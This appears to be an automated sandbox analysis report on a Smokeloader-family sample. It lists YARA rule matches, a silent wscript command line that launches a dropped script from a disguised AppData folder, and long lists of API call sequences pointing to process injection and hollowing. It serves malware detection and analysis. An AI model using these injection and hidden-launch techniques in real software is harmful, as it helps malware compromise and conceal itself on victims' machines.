Source: 00000003.00000002.1937904210.00000000007B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1712173193.0000000000840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1712546480.0000000002361000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1712222757.0000000000850000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000003.00000002.1937842003.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.js"

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00402F55 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F55
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401493
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401476
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014D5
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AA
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AD
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014B1
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_004030B2 NtTerminateProcess,	0_2_004030B2
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00402F55 RtlCreateUserThread,NtTerminateProcess,	3_2_00402F55
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_00401493
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_00401476
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004014D5
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004014AA
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004014AD
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	3_2_004014B1
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_004030B2 NtTerminateProcess,	3_2_004030B2
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Code function: 26_2_0301A090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	26_2_0301A090
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Code function: 26_2_030196B0 NtProtectVirtualMemory,NtProtectVirtualMemory,	26_2_030196B0
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Code function: 26_2_030193F0 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	26_2_030193F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C85ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset,	29_2_6C85ED10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C89B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	29_2_6C89B700
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C89B8C0 rand_s,NtQueryVirtualMemory,	29_2_6C89B8C0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C89B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError,	29_2_6C89B910
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,	29_2_6C83F280
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA662C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,	29_2_6CA662C0

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E842D5: CreateFileW,DeviceIoControl,CloseHandle,

25_2_00E842D5

Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr

Code function: 25_2_00E78F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

25_2_00E78F2E

Source: C:\Users\user\AppData\Local\Temp\329C.exe	Code function: 7_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		7_2_00403899
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E85778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		25_2_00E85778

Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401C5E	0_2_00401C5E
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00401C0A	0_2_00401C0A
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841CC5	0_2_00841CC5
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_0084154D	0_2_0084154D
Source: C:\Users\user\Desktop\h8jGj6Qe78.exe	Code function: 0_2_00841C71	0_2_00841C71
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401C5E	3_2_00401C5E
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_00401C0A	3_2_00401C0A
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_006A1C71	3_2_006A1C71
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_006A154D	3_2_006A154D
Source: C:\Users\user\AppData\Roaming\ewggbbh	Code function: 3_2_006A1CC5	3_2_006A1CC5
Source: C:\Users\user\AppData\Local\Temp\329C.exe	Code function: 7_2_00407577	7_2_00407577
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E2B020	25_2_00E2B020
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E294E0	25_2_00E294E0
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E29C80	25_2_00E29C80
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E423F5	25_2_00E423F5
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00EA8400	25_2_00EA8400
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E56502	25_2_00E56502
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E2E6F0	25_2_00E2E6F0
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E5265E	25_2_00E5265E
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4282A	25_2_00E4282A
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E589BF	25_2_00E589BF
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E56A74	25_2_00E56A74
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00EA0A3A	25_2_00EA0A3A
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E30BE0	25_2_00E30BE0
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E7EDB2	25_2_00E7EDB2
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4CD51	25_2_00E4CD51
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00EA0EB7	25_2_00EA0EB7
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E88E44	25_2_00E88E44
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E56FE6	25_2_00E56FE6
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E433B7	25_2_00E433B7
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E3D45D	25_2_00E3D45D
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4F409	25_2_00E4F409
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E2F6A0	25_2_00E2F6A0
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E416B4	25_2_00E416B4
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E21663	25_2_00E21663
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E3F628	25_2_00E3F628
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E478C3	25_2_00E478C3
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4DBA5	25_2_00E4DBA5
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E41BA8	25_2_00E41BA8
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E59CE5	25_2_00E59CE5
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E3DD28	25_2_00E3DD28
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E41FC0	25_2_00E41FC0
Source: C:\Users\user\AppData\Local\SwiftTech Solutions\SwiftServe.scr	Code function: 25_2_00E4BFD6	25_2_00E4BFD6
Source: C:\Users\user\AppData\Local\Temp\DFA6.exe	Code function: 26_2_0301A700	26_2_0301A700
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8335A0	29_2_6C8335A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C846C80	29_2_6C846C80
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8934A0	29_2_6C8934A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C89C4A0	29_2_6C89C4A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8464C0	29_2_6C8464C0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C85D4D0	29_2_6C85D4D0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83D4E0	29_2_6C83D4E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C876CF0	29_2_6C876CF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8AAC00	29_2_6C8AAC00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C875C10	29_2_6C875C10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C882C10	29_2_6C882C10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A542B	29_2_6C8A542B
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C845440	29_2_6C845440
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A545C	29_2_6C8A545C
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C870DD0	29_2_6C870DD0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8985F0	29_2_6C8985F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C84FD00	29_2_6C84FD00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C860512	29_2_6C860512
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C85ED10	29_2_6C85ED10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C89E680	29_2_6C89E680
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C855E90	29_2_6C855E90
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C894EA0	29_2_6C894EA0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A76E3	29_2_6C8A76E3
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83BEF0	29_2_6C83BEF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C84FEF0	29_2_6C84FEF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C885600	29_2_6C885600
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C877E10	29_2_6C877E10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C899E30	29_2_6C899E30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C854640	29_2_6C854640
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C882E4E	29_2_6C882E4E
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C859E50	29_2_6C859E50
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C873E50	29_2_6C873E50
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A6E63	29_2_6C8A6E63
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83C670	29_2_6C83C670
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8877A0	29_2_6C8877A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83DFE0	29_2_6C83DFE0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C866FF0	29_2_6C866FF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C849F00	29_2_6C849F00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C877710	29_2_6C877710
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8660A0	29_2_6C8660A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A50C7	29_2_6C8A50C7
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C85C0E0	29_2_6C85C0E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8758E0	29_2_6C8758E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C847810	29_2_6C847810
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C87B820	29_2_6C87B820
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C884820	29_2_6C884820
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C858850	29_2_6C858850
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C85D850	29_2_6C85D850
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C87F070	29_2_6C87F070
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C875190	29_2_6C875190
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C892990	29_2_6C892990
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83C9A0	29_2_6C83C9A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C86D9B0	29_2_6C86D9B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C85A940	29_2_6C85A940
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C84D960	29_2_6C84D960
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C88B970	29_2_6C88B970
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8AB170	29_2_6C8AB170
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8ABA90	29_2_6C8ABA90
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8322A0	29_2_6C8322A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C864AA0	29_2_6C864AA0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C84CAB0	29_2_6C84CAB0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A2AB0	29_2_6C8A2AB0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C878AC0	29_2_6C878AC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C851AF0	29_2_6C851AF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C87E2F0	29_2_6C87E2F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C879A60	29_2_6C879A60
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C83F380	29_2_6C83F380
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8A53C8	29_2_6C8A53C8
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C87D320	29_2_6C87D320
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C835340	29_2_6C835340
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C84C370	29_2_6C84C370
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C93ECD0	29_2_6C93ECD0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8DECC0	29_2_6C8DECC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9A6C00	29_2_6C9A6C00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9BAC30	29_2_6C9BAC30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8EAC60	29_2_6C8EAC60
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C976D90	29_2_6C976D90
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E4DB0	29_2_6C8E4DB0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA6CDC0	29_2_6CA6CDC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA68D20	29_2_6CA68D20
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9AED70	29_2_6C9AED70
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA0AD50	29_2_6CA0AD50
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C966E90	29_2_6C966E90
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8EAEC0	29_2_6C8EAEC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C980EC0	29_2_6C980EC0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9C0E20	29_2_6C9C0E20
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C97EE70	29_2_6C97EE70
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA28FB0	29_2_6CA28FB0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8EEFB0	29_2_6C8EEFB0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9BEFF0	29_2_6C9BEFF0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E0FE0	29_2_6C8E0FE0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA20F20	29_2_6CA20F20
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E6F10	29_2_6C8E6F10
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C94EF40	29_2_6C94EF40
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9A2F70	29_2_6C9A2F70
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9E68E0	29_2_6C9E68E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C930820	29_2_6C930820
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C96A820	29_2_6C96A820
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9B4840	29_2_6C9B4840
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9A09B0	29_2_6C9A09B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9709A0	29_2_6C9709A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C99A9A0	29_2_6C99A9A0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9149F0	29_2_6C9149F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9FC9E0	29_2_6C9FC9E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C936900	29_2_6C936900
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C918960	29_2_6C918960
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C95EA80	29_2_6C95EA80
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C98EA00	29_2_6C98EA00
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C998A30	29_2_6C998A30
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C95CA70	29_2_6C95CA70
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C980BA0	29_2_6C980BA0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9E6BE0	29_2_6C9E6BE0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA0A480	29_2_6CA0A480
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9264D0	29_2_6C9264D0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C97A4D0	29_2_6C97A4D0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C96A430	29_2_6C96A430
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C944420	29_2_6C944420
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8F8460	29_2_6C8F8460
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8D45B0	29_2_6C8D45B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C96E5F0	29_2_6C96E5F0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9AA5E0	29_2_6C9AA5E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C938540	29_2_6C938540
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9E4540	29_2_6C9E4540
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C980570	29_2_6C980570
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6CA28550	29_2_6CA28550
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C942560	29_2_6C942560
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9046D0	29_2_6C9046D0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C93E6E0	29_2_6C93E6E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C97E6E0	29_2_6C97E6E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C93C650	29_2_6C93C650
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C90A7D0	29_2_6C90A7D0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C960700	29_2_6C960700
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8D8090	29_2_6C8D8090
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9BC0B0	29_2_6C9BC0B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8F00B0	29_2_6C8F00B0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9A8010	29_2_6C9A8010
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9AC000	29_2_6C9AC000
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C92E070	29_2_6C92E070
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C8E01E0	29_2_6C8E01E0
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C956130	29_2_6C956130
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9C4130	29_2_6C9C4130
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C948140	29_2_6C948140
Source: C:\Users\user\AppData\Local\Temp\svchost015.exe	Code function: 29_2_6C9AE2B0	29_2_6C9AE2B0
